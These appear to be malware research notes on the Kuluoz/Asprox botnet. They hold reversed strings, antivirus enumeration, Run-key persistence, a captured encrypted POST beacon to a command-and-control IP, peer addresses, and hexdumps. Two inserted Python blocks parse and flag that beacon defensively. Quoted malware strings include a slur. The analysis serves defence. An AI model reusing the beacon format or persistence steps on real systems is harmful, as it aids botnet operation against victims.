- ==========================
- #MalwareMustDie
- BOTNET KULUOZ/ASPROX BACK WITH NEW ENCRYPTION
- @unixfreaxjp /malware/temp]$ date
- Tue Nov 12 22:23:08 JST 2013
- Peers (host) with ports 8080:
- 66-29-254-132.ds1-static.mia1.net.ststelecom.com
- mail.colegioamazonas.edu.ec
- hosted-by.shineservers.com
- host.colocrossing.com
- web.globalcell.ge
- gunnebojohnson.com
- ==========================
- SAMPLE ANALYZED:
- https://www.virustotal.com/en/file/1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1/analysis/
- MD5 ec52855b7e522a977330519a8a201993
- SHA1 b09e1a0fb067f2114e186bba5d848dbd7d663325
- SHA256 1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1
- // ==============================
- // QUICK REVERSING ANALYSIS:
- // ==============================
- // Accessing the Security Center:
- ROOT\SecurityCenter
- ROOT\SecurityCenter2
- SELECT * FROM AntiVirusProduct
- ROOT\SecurityCenter
- ROOT\SecurityCenter2
- SELECT * FROM FirewallProduct
- // Grabbing which (AV/firewall) solution you use:
- displayName
- // Series of request POST command:
- // explanation: the URL name and port number are kept in variables, for proxies.
- http://%[^:]:%d/%s
- // The User-Agent used is static (not variable), stored as plaintext in the binary (need to decrypt the binary to see it)
- // The method is POST
- // The hash used for the request was structured as "yvy5VtvLVvh6soaja2YuyfrC" in my case.
- // Plaintext strings are used for the POST form parts: name="key"; filename="key.bin" and name="data"; filename="data.bin"
- // It is bound to: svchost.exe
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
- GET
- yvy5VtvLVvh6soaja2YuyfrC
- svchost.exe
- Content-Type: multipart/form-data; boundary=
- Content-Disposition: form-data; name="key"; filename="key.bin"
- Content-Type: application/octet-stream
- svchost.exe
- Content-Disposition: form-data; name="data"; filename="data.bin"
- Content-Type: application/octet-stream
- Content-Length: %d
- // Requested command:
- /index.php?r=gate
- which posts the infected host's ID data as:
- <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
- // Yes, it is supposed to autorun in:
- Software\Microsoft\Windows\CurrentVersion\Run
- // Self-copied:
- C:\Documents and Settings\User\Local Settings\Application Data\goktqtbh.exe (RANDOM..)
- // Kicking Notepad:
- 0x4c0 svchost.exe C:\WINDOWS\system32\svchost.exe
- 0x768 notepad.exe C:\WINDOWS\system32\NOTEPAD.EX
- with text...
- FATAL ERROR! Error while open file.
- (hex: 464154414C204552524F5221204572726F72207768696C65206F70656E2066696C652E00 )
- // Botnet (fake?) version..
- 1.0.6, 6-Sept-2010
- // Still the same rant detected.. see my previous pastebin:
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- // Added with these:
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- // ==================
- // ENCRYPTION TRACES
- // ==================
- // Data was encrypted using:
- Microsoft Base Cryptographic Provider v1.0
- // Public Key Traces...
- -----BEGIN PUBLIC KEY-----
- jjj
- jjj
- jjj
- jjj
- jjj
- APH
- dLJ1rmxx+bAndp+Cz6+5I
- Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
- jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
- 00SNFZ88nyVv33z9+wIDAQAB
- -----END PUBLIC KEY-----
- // Lotta MD5..
- MD5Init
- MD5Update
- MD5Final
- ==========================
- RESPONSE FROM KULUOZ PEERS
- ==========================
- // DOWNLOADED DATA...
- // data.bin
- 0000 FD B1 64 DF 81 18 D7 F6 9D CB 3A 79 48 B9 BC B9 ..d.......:yH...
- 0010 1E FC C4 7C 3B 1B 0D BF 7A 3E DA 98 4D 09 C3 1B ...|;...z>..M...
- 0020 81 CF EF DF 4E 3A DA ED 69 B0 B9 3E 2F 45 BA 09 ....N:..i..>/E..
- 0030 B5 6C 06 71 D1 A7 15 AA EF B9 A9 7D 27 81 F3 BA .l.q.......}'...
- 0040 92 F6 B7 46 95 C0 06 03 02 DD 0B C1 D9 96 90 27 ...F...........'
- 0050 5F E5 FB E7 B8 C2 9A C8 72 85 A4 41 F5 2F B0 5A _.......r..A./.Z
- 0060 C4 D8 D8 9C 1A 00 63 C3 24 39 6F 23 DA 96 89 63 ......c.$9o#...c
- 0070 F2 8D 0D 15 B3 29 40 D4 91 1B 07 18 22 7E ED B4 .....)@....."~..
- 0080 56 FE D4 42 CF C2 8C 97 19 A9 99 E8 4B 1C 72 9C V..B........K.r.
- 0090 9B 4F AA DF A2 BB BE 72 58 11 7E 8C E1 0A 59 .O.....rX.~...Y
- // ===> This is supposed to look like this (example only):
- // But cannot figure out the encryption yet...
- // All previous attempts failed...
- 0000 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
- 0010 39 33 0a 31 38 36 2e 31 31 32 2e 32 31 34 2e 31 93.186.112.214.1
- 0020 35 38 3a 38 30 38 30 0a 32 30 32 2e 32 39 2e 32 58:8080.202.29.2
- 0030 32 39 2e 32 33 32 3a 38 30 38 30 0a 31 37 38 2e 29.232:8080.178.
- 0040 32 30 38 2e 33 35 2e 31 39 30 3a 38 30 38 30 0a 208.35.190:8080.
- 0050 36 34 2e 37 36 2e 31 39 2e 32 34 31 3a 38 30 38 64.76.19.241:808
- 0060 30 0a 39 35 2e 31 37 33 2e 31 38 36 2e 31 38 34 0.95.173.186.184
- 0070 3a 38 30 38 30 0a 31 37 36 2e 31 32 32 2e 32 32 :8080.176.122.22
- 0080 34 2e 36 32 3a 38 30 38 30 0a 38 32 2e 31 39 32 4.62:8080.82.192
- 0090 2e 39 31 2e 32 32 34 3a 38 30 38 30 0a 38 34 2e .91.224:8080.84
- // key.bin (don't know about this yet...)
- 0000 50 AA B1 3A 7E 51 02 90 D7 D4 C1 0D 52 48 AF EE P..:~Q......RH..
- 0010 EA 86 86 6F D3 96 EF 15 22 98 35 B9 15 96 2D B1 ...o....".5...-.
- 0020 27 83 2E DE B7 3B B5 EB BA 74 78 E8 22 28 5D 49 '....;...tx."(]I
- 0030 B8 B1 00 A0 3C 10 D0 95 EB 03 67 7C 51 06 3B D7 ....<.....g|Q.;.
- 0040 1A 95 1E 7E BF 65 C0 CC 36 C2 D0 A2 E3 6D 24 F9 ...~.e..6....m$.
- 0050 9A CE D0 26 1B 0A A4 5E 6F FA 50 80 6C 22 57 24 ...&...^o.P.l"W$
- 0060 26 D9 2F 0D EE F4 80 31 8D 26 24 DC 86 00 D0 DB &./....1.&$.....
- 0070 CF 31 EE C1 CF 9D AA EC 83 3C 99 75 ED 76 62 45 .1.......<.u.vbE
- // encrypted request in the POST request... PS: yvy5VtvLVvh6soaja2YuyfrC is my hashed PC ID
- // HEADER:
- POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1
- Accept: */*
- Content-Type: multipart/form-data; boundary=yvy5VtvLVvh6soaja2YuyfrC
- Content-Length: 592
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
- Host: 220.67.211.23:8080
- Cache-Control: no-cache
- // DATA...
- yvy5VtvLVvh6soaja2YuyfrC
- Content-Disposition: form-data; name="key"; filename="key.bin"
- Content-Type: application/octet-stream
- ......ON?..u..Y..1.Kf`!.9.*...~.........Ey..p..[>_..S..4/%.N.L4....D.d.....)
- .V....56b.k..E....z.'l.......*..3.h..........w....N
- --yvy5VtvLVvh6soaja2YuyfrC
- Content-Disposition: form-data; name="data"; filename="data.bin"
- Content-Type: application/octet-stream
- .:.U.7T.I..O.{ym....,.i...&.s....U.|....|..z.....$&.........e..v+.6.[....3..........C...W..". h...&I..$t
- /E..4....<KOk....Qt..m.4~.Q|".I..U..u....")a_z$#d..j...
- --yvy5VtvLVvh6soaja2YuyfrC--
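The following Python is an added example (not code from the original notes or from the malware): a parser for the gate POST described above, written from the detection side. It splits the captured request into header and multipart parts, pulls out the key.bin and data.bin blobs, and scores the request against the traits the notes record (POST multipart, the static User-Agent, a hex-only request path, the boundary doubling as the bot ID, the two octet-stream parts). It also types the decrypted knock XML into fields. The User-Agent, part names, boundary and header layout are transcribed from the capture above; the part bodies, the benign comparison request in the test, and every function name are this example's own constructions. Note that in the capture as pasted the first part opens with the bare boundary (no leading "--"), so the splitter deliberately tolerates that.

```python
import re
from typing import Dict, List, Tuple

# Indicators transcribed from the notes above (user-agent, part names, knock layout).
STATIC_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
EXPECTED_PARTS = [("key", "key.bin"), ("data", "data.bin")]
KNOCK_RE = re.compile(
    r"^<knock><id>(?P<id>[^<]*)</id><group>(?P<group>[^<]*)</group>"
    r"<time>(?P<time>\d+)</time><version>(?P<version>\d+)</version>"
    r"<status>(?P<status>\d+)</status><debug>(?P<debug>[^<]*)</debug></knock>$"
)
BOT_ID = "yvy5VtvLVvh6soaja2YuyfrC"  # hashed PC ID from the capture, reused as the boundary
KEY_BLOB = bytes(range(0, 128))      # constructed stand-ins for the encrypted key.bin / data.bin
DATA_BLOB = bytes(range(128, 256))

def split_request(raw: bytes) -> Tuple[Dict[str, str], str, str, bytes]:
    """Split a raw HTTP request into (headers, method, path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, method, path, body

def parse_parts(body: bytes, boundary: str) -> List[Dict[str, object]]:
    """Lenient multipart splitter: in the capture as pasted the first part opens with
    the bare boundary (no leading '--'), so split on the boundary string itself."""
    parts = []
    for chunk in body.split(boundary.encode()):
        if b"\r\n\r\n" not in chunk:      # preamble or the closing "--" trailer
            continue
        part_head, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n--"):   # CRLF plus the dashes of the next boundary line
            content = content[:-4]
        disp = re.search(rb'name="([^"]*)"; filename="([^"]*)"', part_head)
        ctype = re.search(rb"Content-Type: (\S+)", part_head)
        parts.append({
            "name": disp.group(1).decode() if disp else None,
            "filename": disp.group(2).decode() if disp else None,
            "content_type": ctype.group(1).decode() if ctype else None,
            "content": content,
        })
    return parts

def assess_beacon(raw: bytes) -> Dict[str, object]:
    """Score a request against the traits of the gate POST described in the notes."""
    headers, method, path, body = split_request(raw)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=(\S+)", ctype)
    boundary = m.group(1) if m else ""
    parts = parse_parts(body, boundary) if boundary else []
    traits = {
        "post_multipart": method == "POST" and ctype.startswith("multipart/form-data"),
        "static_ua": headers.get("user-agent") == STATIC_UA,
        "hex_only_path": re.fullmatch(r"/[0-9A-Fa-f]+", path) is not None,
        "bare_first_boundary": bool(boundary) and body.startswith(boundary.encode()),
        "key_and_data_parts": [(p["name"], p["filename"]) for p in parts] == EXPECTED_PARTS,
        "octet_stream_parts": bool(parts)
        and all(p["content_type"] == "application/octet-stream" for p in parts),
    }
    return {"score": sum(traits.values()), "traits": traits, "bot_id": boundary, "parts": parts}

def parse_knock(xml: str) -> Dict[str, object]:
    """Parse a decrypted knock into typed fields (the %d fields become ints)."""
    m = KNOCK_RE.match(xml)
    if not m:
        raise ValueError("not a knock message")
    fields = dict(m.groupdict())
    for k in ("time", "version", "status"):
        fields[k] = int(fields[k])
    return fields

def build_sample_request() -> bytes:
    """Constructed request with the captured header layout and dummy part bodies."""
    body = (
        BOT_ID.encode() + b"\r\n"  # bare first boundary, as in the pasted capture
        + b'Content-Disposition: form-data; name="key"; filename="key.bin"\r\n'
        + b"Content-Type: application/octet-stream\r\n\r\n" + KEY_BLOB + b"\r\n"
        + b"--" + BOT_ID.encode() + b"\r\n"
        + b'Content-Disposition: form-data; name="data"; filename="data.bin"\r\n'
        + b"Content-Type: application/octet-stream\r\n\r\n" + DATA_BLOB + b"\r\n"
        + b"--" + BOT_ID.encode() + b"--\r\n"
    )
    head = (
        "POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1\r\n"
        "Accept: */*\r\n"
        f"Content-Type: multipart/form-data; boundary={BOT_ID}\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"User-Agent: {STATIC_UA}\r\n"
        "Host: 220.67.211.23:8080\r\nCache-Control: no-cache\r\n\r\n"
    )
    return head.encode() + body
```

Calling `assess_beacon(build_sample_request())` scores all six traits on the constructed request, while an ordinary file upload scores only the generic "POST multipart" trait; the boundary value is returned as `bot_id` because the notes identify it with the hashed PC ID, which makes it a per-host pivot for correlating beacons in proxy logs. `parse_knock` is there for when the data.bin encryption is worked out: it enforces the exact element order of the format string above and rejects anything else.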
- // The two encrypted blobs above are (hex):
- 442E2E34492E2E54432E2E7B2E750D5335502E2E2E2E2E2E52
- 2E2E33792D2E2E2F2E34202E5D5F2E3F412E492E2E2B4D2E2E
- 2E3F553F2E71552E4B232E0D0A2C2E2E202E2E542E2E2E0D2E
- 2B2E2E26502E2E2E432E2E4D212E2E2E5C2E2E272E2E734157
- 782E2E3E2E2E2E2E2E2E2E2E2E2E2E2E302E2E412E395B2E61
- 6D2E2E2E0D0D0A
- 5F2E462E2E2E2E2E622E2E2E4A232E312E2E2E63326D522E6D
- 212E502E262E6A2E2E2E2E2E2E682E532E2E332E2E2E2E7E2E
- 2E2E2E2E2E2E3D482E2E2E2E2E74642E5D4F2E2E2E2E2E2E78
- 6B2E6E752E502E2E2E2E2E2E5D412E2E2E322E6B2E2E2E2E2E
- 362E7C2E2E2E2E372E4A2E2E2E2E2E78367C7E2E2E512E2E39
- 2E5A2E2E352E67402E2E2E2E2E2E0D0A7B3C7C2E2E73395B2E
- 7D2E662E712E652E460D0D0A
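The following Python is an added example (not code from the original notes) for whoever picks the research up from here. It rebuilds bytes from the hexdump layout used above, parses the expected data.bin plaintext (the 0000..0090 listing of ip:port lines) into a peer list, handling the cut-off trailing entry instead of guessing it, and runs one sanity check on the first hex blob listed above: the share of 0x2E bytes. A hexdump's ASCII column prints every non-printable byte as ".", so a blob that decodes to more than half dots is far more likely to be the hex of that rendered column than the raw ciphertext, and is not usable for cryptanalysis; the downloaded key.bin dump is included for contrast. All dump lines are transcribed from the notes; the function names and the ratio threshold are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Dumps transcribed from the notes above: the expected plaintext of data.bin,
# the downloaded key.bin, and the hex of the first blob from the POST body.
PEER_LIST_DUMP = """
0000 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
0010 39 33 0a 31 38 36 2e 31 31 32 2e 32 31 34 2e 31 93.186.112.214.1
0020 35 38 3a 38 30 38 30 0a 32 30 32 2e 32 39 2e 32 58:8080.202.29.2
0030 32 39 2e 32 33 32 3a 38 30 38 30 0a 31 37 38 2e 29.232:8080.178.
0040 32 30 38 2e 33 35 2e 31 39 30 3a 38 30 38 30 0a 208.35.190:8080.
0050 36 34 2e 37 36 2e 31 39 2e 32 34 31 3a 38 30 38 64.76.19.241:808
0060 30 0a 39 35 2e 31 37 33 2e 31 38 36 2e 31 38 34 0.95.173.186.184
0070 3a 38 30 38 30 0a 31 37 36 2e 31 32 32 2e 32 32 :8080.176.122.22
0080 34 2e 36 32 3a 38 30 38 30 0a 38 32 2e 31 39 32 4.62:8080.82.192
0090 2e 39 31 2e 32 32 34 3a 38 30 38 30 0a 38 34 2e .91.224:8080.84
"""
KEY_BIN_DUMP = """
0000 50 AA B1 3A 7E 51 02 90 D7 D4 C1 0D 52 48 AF EE P..:~Q......RH..
0010 EA 86 86 6F D3 96 EF 15 22 98 35 B9 15 96 2D B1 ...o....".5...-.
0020 27 83 2E DE B7 3B B5 EB BA 74 78 E8 22 28 5D 49 '....;...tx."(]I
0030 B8 B1 00 A0 3C 10 D0 95 EB 03 67 7C 51 06 3B D7 ....<.....g|Q.;.
0040 1A 95 1E 7E BF 65 C0 CC 36 C2 D0 A2 E3 6D 24 F9 ...~.e..6....m$.
0050 9A CE D0 26 1B 0A A4 5E 6F FA 50 80 6C 22 57 24 ...&...^o.P.l"W$
0060 26 D9 2F 0D EE F4 80 31 8D 26 24 DC 86 00 D0 DB &./....1.&$.....
0070 CF 31 EE C1 CF 9D AA EC 83 3C 99 75 ED 76 62 45 .1.......<.u.vbE
"""
POSTED_KEY_HEX = (
    "442E2E34492E2E54432E2E7B2E750D5335502E2E2E2E2E2E52"
    "2E2E33792D2E2E2F2E34202E5D5F2E3F412E492E2E2B4D2E2E"
    "2E3F553F2E71552E4B232E0D0A2C2E2E202E2E542E2E2E0D2E"
    "2B2E2E26502E2E2E432E2E4D212E2E2E5C2E2E272E2E734157"
    "782E2E3E2E2E2E2E2E2E2E2E2E2E2E2E302E2E412E395B2E61"
    "6D2E2E2E0D0D0A"
)

def parse_hexdump(dump: str) -> bytes:
    """Rebuild bytes from 'OFFSET XX XX ... ascii' lines (the layout used in the notes)."""
    out = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split()
        if not re.fullmatch(r"[0-9A-Fa-f]{4}", tokens[0]):
            raise ValueError(f"unrecognised hexdump line: {line!r}")
        for tok in tokens[1:17]:          # at most 16 bytes per line; the ASCII column follows
            if not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def parse_peer_list(plain: bytes) -> Tuple[List[Tuple[str, int]], str]:
    """Parse newline-separated 'host:port' records. Text after the last newline
    (a cut-off trailing entry) is returned as-is rather than guessed at."""
    entries = plain.decode("ascii").split("\n")
    tail = entries.pop()
    peers = []
    for entry in entries:
        host, _, port = entry.rpartition(":")
        peers.append((host, int(port)))
    return peers, tail

def dot_ratio(blob: bytes) -> float:
    """Share of 0x2E ('.') bytes; high values point at a dotted ASCII rendering."""
    return blob.count(0x2E) / len(blob) if blob else 0.0

def analyse() -> Dict[str, object]:
    """Run the three checks over the transcribed dumps."""
    peers, tail = parse_peer_list(parse_hexdump(PEER_LIST_DUMP))
    return {
        "peers": peers,
        "truncated_tail": tail,
        "key_bin_dot_ratio": dot_ratio(parse_hexdump(KEY_BIN_DUMP)),
        "posted_key_dot_ratio": dot_ratio(bytes.fromhex(POSTED_KEY_HEX)),
    }
```

On the dumps above `analyse()` recovers eight complete peers (the first on port 993, the rest on 8080, matching the peer list at the top of the notes) plus the dangling "84." fragment, a dot ratio of 1/128 for the downloaded key.bin, and a ratio above one half for the posted blob; before spending time on the encryption, re-capture the POST body as raw bytes rather than from a printable rendering.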
- // ==> this is supposed to look like this once matched.. (from binary reversing)
- // we need to know the encryption used to pop out the values of
- id, group, time, version, status and debug.
- <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
- Please take this research from here..
- ---
- #MalwareMustDie!